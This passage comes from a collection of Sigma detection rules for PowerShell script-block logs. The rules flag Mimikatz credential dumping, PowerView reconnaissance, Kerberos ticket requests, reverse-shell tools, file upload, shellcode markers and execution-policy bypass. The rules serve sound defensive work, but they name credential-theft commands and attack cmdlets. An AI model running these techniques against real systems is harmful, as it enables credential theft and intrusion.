    "content": "title: Code Executed Via Office Add-in XLL File\nid: 36fbec91-fa1b-4d5d-8df1-8d8edcb632ad\nstatus: test\ndescription: |\n    Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\n    Office add-ins can be used to add functionality to Office programs\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md\nauthor: frack113\ndate: 2021-12-28\ntags:\n    - attack.persistence\n    - attack.t1137.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'new-object '\n            - '-ComObject '\n            - '.application'\n            - '.RegisterXLL'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_packet_capture.yml",
    "content": "title: Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock\nid: da34e323-1e65-42db-83be-a6725ac2caa3\nstatus: test\ndescription: |\n    Detects the execution of powershell scripts with calls to the \"Start-NetEventSession\" cmdlet. Which allows an attacker to start event and packet capture for a network event session.\n    Adversaries may attempt to capture network to gather information over the course of an operation.\n    Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing\n    - https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md\n    - https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13\nauthor: frack113\ndate: 2024-05-12\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Start-NetEventSession'\n    condition: selection\nfalsepositives:\n    - Legitimate network diagnostic scripts.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml",
    "content": "title: Potential Invoke-Mimikatz PowerShell Script\nid: 189e3b02-82b2-4b90-9662-411eb64486d4\nstatus: test\ndescription: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-28\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: ps_script\n    product: windows\ndetection:\n    selection_1:\n        ScriptBlockText|contains|all:\n            - 'DumpCreds'\n            - 'DumpCerts'\n    selection_2:\n        ScriptBlockText|contains: 'sekurlsa::logonpasswords'\n    selection_3:\n        ScriptBlockText|contains|all:\n            - 'crypto::certificates'\n            - 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\n    condition: 1 of selection*\nfalsepositives:\n    - Mimikatz can be useful for testing the security of networks\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_potential_unconstrained_delegation_discovery.yml",
    "content": "title: Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock\nid: cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5\nstatus: experimental\ndescription: Detects the use of the \"Get-ADComputer\" cmdlet in order to identify systems which are configured for unconstrained delegation.\nreferences:\n    - https://pentestlab.blog/2022/03/21/unconstrained-delegation/\n    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps\nauthor: frack113\ndate: 2025-03-05\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1018\n    - attack.t1558\n    - attack.t1589.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enable'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - '-Properties*TrustedForDelegation'\n            - '-Properties*TrustedToAuthForDelegation'\n            - '-Properties*msDS-AllowedToDelegateTo'\n            - '-Properties*PrincipalsAllowedToDelegateToAccount'\n            - '-LDAPFilter*(userAccountControl:1.2.840.113556.1.4.803:=524288)'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_powershell_web_access_installation.yml",
    "content": "title: PowerShell Web Access Installation - PsScript\nid: 5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f\nstatus: test\ndescription: Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n    - https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\nauthor: Michael Haag\ndate: 2024-09-03\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_install:\n        ScriptBlockText|contains: 'Install-WindowsFeature WindowsPowerShellWebAccess'\n    selection_config:\n        ScriptBlockText|contains: 'Install-PswaWebApplication'\n    selection_auth:\n        ScriptBlockText|contains|all:\n            - 'Add-PswaAuthorizationRule'\n            - '-UserName *'\n            - '-ComputerName *'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate PowerShell Web Access installations by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml",
    "content": "title: PowerView PowerShell Cmdlets - ScriptBlock\nid: dcd74b95-3f36-4ed9-9598-0490951643aa\nrelated:\n    - id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d\n      type: similar\nstatus: test\ndescription: Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.\nreferences:\n    - https://powersploit.readthedocs.io/en/stable/Recon/README\n    - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon\n    - https://thedfirreport.com/2020/10/08/ryuks-return\n    - https://adsecurity.org/?p=2277\nauthor: Bhabesh Raj\ndate: 2021-05-18\nmodified: 2023-11-22\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Export-PowerViewCSV'\n            - 'Find-DomainLocalGroupMember'\n            - 'Find-DomainObjectPropertyOutlier'\n            - 'Find-DomainProcess'\n            - 'Find-DomainShare'\n            - 'Find-DomainUserEvent'\n            - 'Find-DomainUserLocation'\n            - 'Find-ForeignGroup'\n            - 'Find-ForeignUser'\n            - 'Find-GPOComputerAdmin'\n            - 'Find-GPOLocation'\n            - 'Find-InterestingDomain' # Covers: Find-InterestingDomainAcl, Find-InterestingDomainShareFile\n            - 'Find-InterestingFile'\n            - 'Find-LocalAdminAccess'\n            - 'Find-ManagedSecurityGroups'\n            - 'Get-CachedRDPConnection'\n            - 'Get-DFSshare'\n            - 'Get-DomainDFSShare'\n            - 'Get-DomainDNSRecord'\n            - 'Get-DomainDNSZone'\n            - 'Get-DomainFileServer'\n            - 'Get-DomainGPOComputerLocalGroupMapping'\n            - 'Get-DomainGPOLocalGroup'\n            - 'Get-DomainGPOUserLocalGroupMapping'\n            - 'Get-LastLoggedOn'\n            - 'Get-LoggedOnLocal'\n            - 'Get-NetFileServer'\n            - 
'Get-NetForest' # Covers: Get-NetForestCatalog, Get-NetForestDomain, Get-NetForestTrust\n            - 'Get-NetGPOGroup'\n            - 'Get-NetProcess'\n            - 'Get-NetRDPSession'\n            - 'Get-RegistryMountedDrive'\n            - 'Get-RegLoggedOn'\n            - 'Get-WMIRegCachedRDPConnection'\n            - 'Get-WMIRegLastLoggedOn'\n            - 'Get-WMIRegMountedDrive'\n            - 'Get-WMIRegProxy'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-CheckLocalAdminAccess'\n            - 'Invoke-EnumerateLocalAdmin'\n            - 'Invoke-EventHunter'\n            - 'Invoke-FileFinder'\n            - 'Invoke-Kerberoast'\n            - 'Invoke-MapDomainTrust'\n            - 'Invoke-ProcessHunter'\n            - 'Invoke-RevertToSelf'\n            - 'Invoke-ShareFinder'\n            - 'Invoke-UserHunter'\n            - 'Invoke-UserImpersonation'\n            - 'Remove-RemoteConnection'\n            - 'Request-SPNTicket'\n            - 'Resolve-IPAddress'\n            # - 'Get-ADObject'  # prone to FPs\n            # - 'Get-Domain'  # too many FPs  # Covers Cmdlets like: DomainComputer, DomainController, DomainDFSShare, DomainDNSRecord, DomainGPO, etc.\n            # - 'Add-DomainGroupMember'\n            # - 'Add-DomainObjectAcl'\n            # - 'Add-ObjectAcl'\n            # - 'Add-RemoteConnection'\n            # - 'Convert-ADName'\n            # - 'Convert-NameToSid'\n            # - 'ConvertFrom-UACValue'\n            # - 'ConvertTo-SID'\n            # - 'Get-DNSRecord'\n            # - 'Get-DNSZone'\n            # - 'Get-DomainComputer'\n            # - 'Get-DomainController'\n            # - 'Get-DomainGroup'\n            # - 'Get-DomainGroupMember'\n            # - 'Get-DomainManagedSecurityGroup'\n            # - 'Get-DomainObject'\n            # - 'Get-DomainObjectAcl'\n            # - 'Get-DomainOU'\n            # - 'Get-DomainPolicy'\n            # - 'Get-DomainSID'\n            # - 'Get-DomainSite'\n            # - 
'Get-DomainSPNTicket'\n            # - 'Get-DomainSubnet'\n            # - 'Get-DomainUser'\n            # - 'Get-DomainUserEvent'\n            # - 'Get-Forest' # Covers: Get-ForestDomain, Get-ForestGlobalCatalog, Get-ForestTrust\n            # - 'Get-IPAddress'\n            # - 'Get-NetComputer' # Covers: Get-NetComputerSiteName\n            # - 'Get-NetDomain' # Covers: Get-NetDomainController, Get-NetDomainTrust\n            # - 'Get-NetGroup' # Covers: Get-NetGroupMember\n            # - 'Get-NetLocalGroup' # Covers: NetLocalGroupMember\n            # - 'Get-NetLoggedon'\n            # - 'Get-NetOU'\n            # - 'Get-NetSession'\n            # - 'Get-NetShare'\n            # - 'Get-NetSite'\n            # - 'Get-NetSubnet'\n            # - 'Get-NetUser'\n            # - 'Get-ObjectAcl'\n            # - 'Get-PathAcl'\n            # - 'Get-Proxy'\n            # - 'Get-SiteName'\n            # - 'Get-UserEvent'\n            # - 'Get-WMIProcess'\n            # - 'New-DomainGroup'\n            # - 'New-DomainUser'\n            # - 'Set-ADObject'\n            # - 'Set-DomainObject'\n            # - 'Set-DomainUserPassword'\n            # - 'Test-AdminAccess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml",
    "content": "title: PowerShell Credential Prompt\nid: ca8b77a9-d499-4095-b793-5d5f330d450e\nstatus: test\ndescription: Detects PowerShell calling a credential prompt\nreferences:\n    - https://twitter.com/JohnLaTwC/status/850381440629981184\n    - https://t.co/ezOTGy1a1G\nauthor: John Lambert (idea), Florian Roth (Nextron Systems)\ndate: 2017-04-09\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'PromptForCredential'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml",
    "content": "title: PSAsyncShell - Asynchronous TCP Reverse Shell\nid: afd3df04-948d-46f6-ae44-25966c44b97f\nstatus: test\ndescription: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell\nreferences:\n    - https://github.com/JoelGMSec/PSAsyncShell\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-04\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'PSAsyncShell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_psattack.yml",
    "content": "title: PowerShell PSAttack\nid: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5\nstatus: test\ndescription: Detects the use of PSAttack PowerShell hack tool\nreferences:\n    - https://adsecurity.org/?p=2921\nauthor: Sean Metcalf (source), Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'PS ATTACK!!!'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml",
    "content": "title: PowerShell Remote Session Creation\nid: a0edd39f-a0c6-4c17-8141-261f958e8d8f\nstatus: test\ndescription: |\n    Adversaries may abuse PowerShell commands and scripts for execution.\n    PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4\nauthor: frack113\ndate: 2022-01-06\nmodified: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-PSSession'\n            - '-ComputerName '\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml",
    "content": "title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock\nid: cacef8fc-9d3d-41f7-956d-455c6e881bc5\nrelated:\n    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation\n      type: similar\n    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic\n      type: similar\n    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module\n      type: similar\nstatus: test\ndescription: Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|startswith: 'function Get-VMRemoteFXPhysicalVideoAdapter {'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml",
    "content": "title: Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock\nid: a861d835-af37-4930-bcd6-5b178bfb54df\nrelated:\n    - id: caa9a802-8bd8-4b9e-a5cd-4d6221670219\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that utilize native PowerShell Identity modules to request Kerberos tickets.\n    This behavior is typically seen during a Kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell\n    - https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.kerberosrequestorsecuritytoken?view=netframework-4.8.1\nauthor: frack113\ndate: 2021-12-28\nmodified: 2025-11-18\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'System.IdentityModel.Tokens.KerberosRequestorSecurityToken'\n            - '.GetRequest()'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml",
    "content": "title: PowerShell Script With File Hostname Resolving Capabilities\nid: fbc5e92f-3044-4e73-a5c6-1c4359b539de\nstatus: test\ndescription: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.\nreferences:\n    - https://www.fortypoundhead.com/showcontent.asp?artid=24022\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-content '\n            - 'foreach'\n            - '[System.Net.Dns]::GetHostEntry'\n            - 'Out-File'\n    condition: selection\nfalsepositives:\n    - The same functionality can be implemented by admin scripts, correlate with name and creator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml",
    "content": "title: Root Certificate Installed - PowerShell\nid: 42821614-9264-4761-acfc-5772c3286f76\nstatus: test\ndescription: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: 'oscd.community, @redcanary, Zach Stanford @svch0st'\ndate: 2020-10-10\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection1:\n        ScriptBlockText|contains|all:\n            - 'Move-Item'\n            - 'Cert:\\LocalMachine\\Root'\n    selection2:\n        ScriptBlockText|contains|all:\n            - 'Import-Certificate'\n            - 'Cert:\\LocalMachine\\Root'\n    condition: 1 of selection*\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml",
    "content": "title: Suspicious Invoke-Item From Mount-DiskImage\nid: 902cedee-0398-4e3a-8183-6f3a89773a96\nstatus: test\ndescription: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso\n    - https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Mount-DiskImage '\n            - '-ImagePath '\n            - Get-Volume\n            - '.DriveLetter'\n            - 'invoke-item '\n            - '):\\'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml",
    "content": "title: PowerShell Script With File Upload Capabilities\nid: d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb\nstatus: test\ndescription: Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md\n    - https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4\nauthor: frack113\ndate: 2022-01-07\nmodified: 2025-07-18\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - 'irm '\n            - 'iwr '\n    selection_flag:\n        ScriptBlockText|contains:\n            - '-Method \"POST\"'\n            - '-Method \"PUT\"'\n            - '-Method POST'\n            - '-Method PUT'\n            - \"-Method 'POST'\"\n            - \"-Method 'PUT'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml",
    "content": "title: Powershell Sensitive File Discovery\nid: 7d416556-6502-45b2-9bad-9d2f05f38997\nrelated:\n    - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9\n      type: derived\nstatus: test\ndescription: Detect adversaries enumerate sensitive files\nreferences:\n    - https://twitter.com/malmoeb/status/1570814999370801158\nauthor: frack113\ndate: 2022-09-16\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_action:\n        ScriptBlockText|contains:\n            - ls\n            - get-childitem\n            - gci\n    selection_recurse:\n        ScriptBlockText|contains: '-recurse'\n    selection_file:\n        ScriptBlockText|contains:\n            - '.pass'\n            - '.kdbx'\n            - '.kdb'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_set_acl.yml",
    "content": "title: PowerShell Script Change Permission Via Set-Acl - PsScript\nid: cae80281-ef23-44c5-873b-fd48d2666f49\nrelated:\n    - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\n      type: derived\n    - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low\n      type: derived\n    - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts set ACL to of a file or a folder\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.defense-evasion\n    - attack.t1222\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n            - '-Path '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml",
    "content": "title: PowerShell Set-Acl On Windows Folder - PsScript\nid: 3bf1d859-3a7e-44cb-8809-a99e066d3478\nrelated:\n    - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low\n      type: derived\n    - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\n      type: derived\n    - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts to set the ACL to a file in the Windows folder\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.defense-evasion\n    - attack.t1222\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n    selection_paths:\n        # Note: Add more suspicious paths\n        ScriptBlockText|contains:\n            - '-Path \"C:\\Windows'\n            - '-Path \"C:/Windows'\n            - \"-Path 'C:\\\\Windows\"\n            - \"-Path 'C:/Windows\"\n            - '-Path C:\\\\Windows'\n            - '-Path C:/Windows'\n            - '-Path $env:windir'\n            - '-Path \"$env:windir'\n            - \"-Path '$env:windir\"\n    selection_permissions:\n        # Note: Add more suspicious permissions\n        ScriptBlockText|contains:\n            - 'FullControl'\n            - 'Allow'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml",
    "content": "title: Change PowerShell Policies to an Insecure Level - PowerShell\nid: 61d0475c-173f-4844-86f7-f3eebae1c66b\nrelated:\n    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry\n      type: similar\n    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet\n      type: similar\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry\n      type: similar\nstatus: test\ndescription: Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4\n    - https://adsecurity.org/?p=2604\nauthor: frack113\ndate: 2021-10-20\nmodified: 2023-12-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Set-ExecutionPolicy'\n    selection_option:\n        ScriptBlockText|contains:\n            - 'Unrestricted'\n            - 'bypass'\n    filter_optional_chocolatey:\n        ScriptBlockText|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1')\"\n            - \"(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')\"\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrator script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml",
    "content": "title: PowerShell ShellCode\nid: 16b37b70-6fcf-4814-a092-c36bd3aafcbd\nstatus: test\ndescription: Detects Base64 encoded Shellcode\nreferences:\n    - https://twitter.com/cyb3rops/status/1063072865992523776\nauthor: David Ledbetter (shellcode), Florian Roth (Nextron Systems)\ndate: 2018-11-17\nmodified: 2024-01-25\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'OiCAAAAYInlM'\n            - 'OiJAAAAYInlM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml",
    "content": "title: Malicious ShellIntel PowerShell Commandlets\nid: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7\nstatus: test\ndescription: Detects Commandlet names from ShellIntel exploitation scripts.\nreferences:\n    - https://github.com/Shellntel/scripts/\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Invoke-SMBAutoBrute'\n            - 'Invoke-GPOLinks'\n            # - 'Out-Minidump' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-Potato'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml",
